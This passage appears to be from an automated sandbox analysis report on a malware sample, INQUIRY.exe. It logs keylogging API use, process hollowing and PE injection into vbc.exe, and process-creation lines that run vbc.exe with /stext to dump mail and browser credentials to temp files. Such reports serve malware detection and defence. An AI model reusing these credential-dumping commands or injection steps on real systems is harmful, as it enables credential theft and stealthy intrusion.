                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                    Allocates memory in foreign processesShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                    Injects a PE file into a foreign processesShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another processShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: unknown target: C:\Users\user\Desktop\INQUIRY.exe protection: execute and read and write
                    Sample uses process hollowing techniqueShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                    Writes to foreign memory regionsShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                    Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2284
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe 'C:\Users\user\Desktop\INQUIRY.exe'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2272
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2100
